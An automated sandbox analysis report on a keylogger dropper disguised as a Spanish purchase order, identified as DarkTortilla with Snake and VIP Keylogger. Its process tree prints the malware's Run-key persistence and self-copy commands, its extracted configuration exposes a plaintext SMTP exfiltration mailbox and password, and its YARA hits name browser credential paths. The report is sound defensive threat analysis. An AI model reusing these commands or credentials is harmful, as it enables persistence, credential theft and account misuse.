Edit tour

Windows Analysis Report
CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe

Overview

General Information

Sample name:	CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe
Analysis ID:	1510344
MD5:	fec61e105cbb213bcdb38af0dd1ec8ba
SHA1:	0fab2cecf901eac6cb0a7887e475257034aec63b
SHA256:	246922b00b01800adedac053d0dd147ec65f3438f1620b2bb6a41f28cc21d149
Tags:	exe
Infos:

Detection

DarkTortilla, Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected AntiVM3

Yara detected DarkTortilla Crypter

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

AI detected suspicious sample

Allocates memory in foreign processes

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to launch a process as a different user

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates processes with suspicious names

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Direct Autorun Keys Modification

Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE

Sigma detected: Suspicious Outbound SMTP Connections

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Uses reg.exe to modify the Windows registry

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe (PID: 7556 cmdline: "C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe" MD5: FEC61E105CBB213BCDB38AF0DD1EC8BA)

cmd.exe (PID: 7816 cmdline: "cmd" /c ping 127.0.0.1 -n 18 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "xload" /t REG_SZ /d "C:\Users\user\AppData\Roaming\xload.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

PING.EXE (PID: 7860 cmdline: ping 127.0.0.1 -n 18 MD5: B3624DD758CCECF93A1226CEF252CA12)

reg.exe (PID: 7316 cmdline: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "xload" /t REG_SZ /d "C:\Users\user\AppData\Roaming\xload.exe" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

cmd.exe (PID: 8128 cmdline: "cmd" /c ping 127.0.0.1 -n 24 > nul && copy "C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe" "C:\Users\user\AppData\Roaming\xload.exe" && ping 127.0.0.1 -n 24 > nul && "C:\Users\user\AppData\Roaming\xload.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 8140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

PING.EXE (PID: 8172 cmdline: ping 127.0.0.1 -n 24 MD5: B3624DD758CCECF93A1226CEF252CA12)

PING.EXE (PID: 4072 cmdline: ping 127.0.0.1 -n 24 MD5: B3624DD758CCECF93A1226CEF252CA12)

xload.exe (PID: 5652 cmdline: "C:\Users\user\AppData\Roaming\xload.exe" MD5: FEC61E105CBB213BCDB38AF0DD1EC8BA)

InstallUtil.exe (PID: 2036 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

xload.exe (PID: 6304 cmdline: "C:\Users\user\AppData\Roaming\xload.exe" MD5: FEC61E105CBB213BCDB38AF0DD1EC8BA)

xload.exe (PID: 5800 cmdline: "C:\Users\user\AppData\Roaming\xload.exe" MD5: FEC61E105CBB213BCDB38AF0DD1EC8BA)

InstallUtil.exe (PID: 1072 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DarkTortilla	DarkTortilla is a complex and highly configurable .NET-based crypter that has possibly been active since at least August 2015. It typically delivers popular information stealers and remote access trojans (RATs) such as AgentTesla, AsyncRat, NanoCore, and RedLine. While it appears to primarily deliver commodity malware, Secureworks Counter Threat Unit (CTU) researchers identified DarkTortilla samples delivering targeted payloads such as Cobalt Strike and Metasploit. It can also deliver "addon packages" such as additional malicious payloads, benign decoy documents, and executables. It features robust anti-analysis and anti-tamper controls that can make detection, analysis, and eradication challenging.From January 2021 through May 2022, an average of 93 unique DarkTortilla samples per week were uploaded to the VirusTotal analysis service. Code similarities suggest possible links between DarkTortilla and other malware: a crypter operated by the RATs Crew threat group, which was active between 2008 and 2012, and the Gameloader malware that emerged in 2021.	No Attribution	https://www.secureworks.com/research/darktortilla-malware-analysis	https://malpedia.caad.fkie.fraunhofer.de/details/win.darktortilla

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "logs@astonherald.com", "Password": "office12#", "Host": "smtp.zoho.eu", "Port": "587", "Version": "4.4"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "logs@astonherald.com", "Password": "office12#", "Host": "smtp.zoho.eu", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1532858501.0000000002720000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
00000011.00000002.2317328552.0000000002A9B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
00000011.00000002.2326278811.0000000003BF3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
00000011.00000002.2326278811.0000000003B29000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
00000015.00000002.2518447949.00000000039D5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
00000014.00000002.2614654788.00000000029A3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000015.00000002.2518447949.0000000003AE3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
00000015.00000002.2518447949.0000000003A19000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
00000011.00000002.2326278811.0000000003AE5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
00000011.00000002.2317328552.00000000029A1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
00000000.00000002.1541699498.0000000004DD0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
00000011.00000002.2326278811.00000000039A9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000011.00000002.2326278811.00000000039A9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000011.00000002.2326278811.00000000039A9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000011.00000002.2326278811.00000000039A9000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dda6:$a1: get_encryptedPassword 0x2e0d7:$a2: get_encryptedUsername 0x2dbb6:$a3: get_timePasswordChanged 0x2dcbf:$a4: get_passwordField 0x2ddbc:$a5: set_encryptedPassword 0x2f44c:$a7: get_logins 0x2f398:$a10: KeyLoggerEventArgs 0x2effd:$a11: KeyLoggerEventArgsEventHandler
00000014.00000002.2614654788.00000000028A1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000016.00000002.2609226677.0000000000409000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000016.00000002.2609226677.0000000000409000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x26856:$a1: get_encryptedPassword 0x26b87:$a2: get_encryptedUsername 0x26666:$a3: get_timePasswordChanged 0x2676f:$a4: get_passwordField 0x2686c:$a5: set_encryptedPassword 0x27efc:$a7: get_logins 0x27e48:$a10: KeyLoggerEventArgs 0x27aad:$a11: KeyLoggerEventArgsEventHandler
00000015.00000002.2502322586.000000000298C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
00000000.00000002.1532858501.0000000002561000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
00000015.00000002.2502322586.0000000002891000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
00000000.00000002.1534523636.0000000003770000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
00000000.00000002.1534523636.0000000003770000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1534523636.0000000003770000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000000.00000002.1534523636.0000000003770000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.1534523636.0000000003770000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2ddf8:$a1: get_encryptedPassword 0x715ae:$a1: get_encryptedPassword 0x2e129:$a2: get_encryptedUsername 0x718df:$a2: get_encryptedUsername 0x2dc08:$a3: get_timePasswordChanged 0x713be:$a3: get_timePasswordChanged 0x2dd11:$a4: get_passwordField 0x714c7:$a4: get_passwordField 0x2de0e:$a5: set_encryptedPassword 0x715c4:$a5: set_encryptedPassword 0x2f49e:$a7: get_logins 0x72c54:$a7: get_logins 0x2f3ea:$a10: KeyLoggerEventArgs 0x72ba0:$a10: KeyLoggerEventArgs 0x2f04f:$a11: KeyLoggerEventArgsEventHandler 0x72805:$a11: KeyLoggerEventArgsEventHandler
00000000.00000002.1534523636.000000000361E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
00000000.00000002.1534523636.000000000361E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1534523636.000000000361E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000000.00000002.1534523636.000000000361E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000016.00000002.2614850427.0000000002B41000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.1534523636.000000000361E000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x71f08:$a1: get_encryptedPassword 0xb56d8:$a1: get_encryptedPassword 0xf8e98:$a1: get_encryptedPassword 0x72239:$a2: get_encryptedUsername 0xb5a09:$a2: get_encryptedUsername 0xf91c9:$a2: get_encryptedUsername 0x71d18:$a3: get_timePasswordChanged 0xb54e8:$a3: get_timePasswordChanged 0xf8ca8:$a3: get_timePasswordChanged 0x71e21:$a4: get_passwordField 0xb55f1:$a4: get_passwordField 0xf8db1:$a4: get_passwordField 0x71f1e:$a5: set_encryptedPassword 0xb56ee:$a5: set_encryptedPassword 0xf8eae:$a5: set_encryptedPassword 0x735ae:$a7: get_logins 0xb6d7e:$a7: get_logins 0xfa53e:$a7: get_logins 0x734fa:$a10: KeyLoggerEventArgs 0xb6cca:$a10: KeyLoggerEventArgs 0xfa48a:$a10: KeyLoggerEventArgs
Process Memory Space: CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe PID: 7556	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
Process Memory Space: CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe PID: 7556	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe PID: 7556	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe PID: 7556	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe PID: 7556	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe PID: 7556	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x4adf0:$a1: get_encryptedPassword 0x6249c:$a1: get_encryptedPassword 0x4b117:$a2: get_encryptedUsername 0x627c3:$a2: get_encryptedUsername 0x4ac0a:$a3: get_timePasswordChanged 0x622b6:$a3: get_timePasswordChanged 0x4ad13:$a4: get_passwordField 0x623bf:$a4: get_passwordField 0x4ae06:$a5: set_encryptedPassword 0x624b2:$a5: set_encryptedPassword 0x4d2f7:$a7: get_logins 0x649a3:$a7: get_logins 0x4d243:$a10: KeyLoggerEventArgs 0x648ef:$a10: KeyLoggerEventArgs 0x4ceac:$a11: KeyLoggerEventArgsEventHandler 0x64558:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: xload.exe PID: 5800	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
Process Memory Space: xload.exe PID: 5800	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: xload.exe PID: 5800	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: xload.exe PID: 5800	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: xload.exe PID: 5800	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: xload.exe PID: 5800	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2b7bf:$a1: get_encryptedPassword 0x2bae6:$a2: get_encryptedUsername 0x2b5d9:$a3: get_timePasswordChanged 0x2b6e2:$a4: get_passwordField 0x2b7d5:$a5: set_encryptedPassword 0x2dcc6:$a7: get_logins 0x2dc12:$a10: KeyLoggerEventArgs 0x2d87b:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: InstallUtil.exe PID: 1072	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: InstallUtil.exe PID: 1072	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: xload.exe PID: 5652	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
Process Memory Space: xload.exe PID: 5652	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: InstallUtil.exe PID: 2036	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: InstallUtil.exe PID: 2036	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: InstallUtil.exe PID: 2036	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2bc25:$a1: get_encryptedPassword 0x2bf4c:$a2: get_encryptedUsername 0x2ba3f:$a3: get_timePasswordChanged 0x2bb48:$a4: get_passwordField 0x2bc3b:$a5: set_encryptedPassword 0x2e12c:$a7: get_logins 0x2e078:$a10: KeyLoggerEventArgs 0x2dce1:$a11: KeyLoggerEventArgsEventHandler
Click to see the 46 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
21.2.xload.exe.39924b2.4.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
21.2.xload.exe.3aa03a2.2.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
17.2.xload.exe.3bb03a2.2.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
17.2.xload.exe.3aa24b2.3.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.4dd0000.5.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.4dd0000.5.raw.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37b3b58.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37b3b58.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37b3b58.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37b3b58.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2bc56:$a1: get_encryptedPassword 0x2bf87:$a2: get_encryptedUsername 0x2ba66:$a3: get_timePasswordChanged 0x2bb6f:$a4: get_passwordField 0x2bc6c:$a5: set_encryptedPassword 0x2d2fc:$a7: get_logins 0x2d248:$a10: KeyLoggerEventArgs 0x2cead:$a11: KeyLoggerEventArgsEventHandler
0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37b3b58.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x39a08:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x390ab:$a3: \Google\Chrome\User Data\Default\Login Data 0x39308:$a4: \Orbitum\User Data\Default\Login Data 0x39ce7:$a5: \Kometa\User Data\Default\Login Data
0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37b3b58.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2c872:$s1: UnHook 0x2c879:$s2: SetHook 0x2c881:$s3: CallNextHook 0x2c88e:$s4: _hook
0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36624b2.4.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36624b2.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36624b2.4.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36624b2.4.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36624b2.4.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2bc56:$a1: get_encryptedPassword 0x2bf87:$a2: get_encryptedUsername 0x2ba66:$a3: get_timePasswordChanged 0x2bb6f:$a4: get_passwordField 0x2bc6c:$a5: set_encryptedPassword 0x2d2fc:$a7: get_logins 0x2d248:$a10: KeyLoggerEventArgs 0x2cead:$a11: KeyLoggerEventArgsEventHandler
0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36624b2.4.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x39a08:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x390ab:$a3: \Google\Chrome\User Data\Default\Login Data 0x39308:$a4: \Orbitum\User Data\Default\Login Data 0x39ce7:$a5: \Kometa\User Data\Default\Login Data
0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36624b2.4.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2c872:$s1: UnHook 0x2c879:$s2: SetHook 0x2c881:$s3: CallNextHook 0x2c88e:$s4: _hook
0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36e9442.3.raw.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36e9442.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36e9442.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36e9442.3.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36e9442.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
22.2.InstallUtil.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
22.2.InstallUtil.exe.400000.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
22.2.InstallUtil.exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
22.2.InstallUtil.exe.400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2da56:$a1: get_encryptedPassword 0x2dd87:$a2: get_encryptedUsername 0x2d866:$a3: get_timePasswordChanged 0x2d96f:$a4: get_passwordField 0x2da6c:$a5: set_encryptedPassword 0x2f0fc:$a7: get_logins 0x2f048:$a10: KeyLoggerEventArgs 0x2ecad:$a11: KeyLoggerEventArgsEventHandler
22.2.InstallUtil.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2e672:$s1: UnHook 0x2e679:$s2: SetHook 0x2e681:$s3: CallNextHook 0x2e68e:$s4: _hook
0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36e9442.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2da56:$a1: get_encryptedPassword 0x2dd87:$a2: get_encryptedUsername 0x2d866:$a3: get_timePasswordChanged 0x2d96f:$a4: get_passwordField 0x2da6c:$a5: set_encryptedPassword 0x2f0fc:$a7: get_logins 0x2f048:$a10: KeyLoggerEventArgs 0x2ecad:$a11: KeyLoggerEventArgsEventHandler
0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37703a2.0.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37703a2.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37703a2.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37703a2.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36e9442.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b808:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3aeab:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b108:$a4: \Orbitum\User Data\Default\Login Data 0x3bae7:$a5: \Kometa\User Data\Default\Login Data
0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37b3b58.1.raw.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37b3b58.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37b3b58.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37b3b58.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37b3b58.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37703a2.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2bc56:$a1: get_encryptedPassword 0x2bf87:$a2: get_encryptedUsername 0x2ba66:$a3: get_timePasswordChanged 0x2bb6f:$a4: get_passwordField 0x2bc6c:$a5: set_encryptedPassword 0x2d2fc:$a7: get_logins 0x2d248:$a10: KeyLoggerEventArgs 0x2cead:$a11: KeyLoggerEventArgsEventHandler
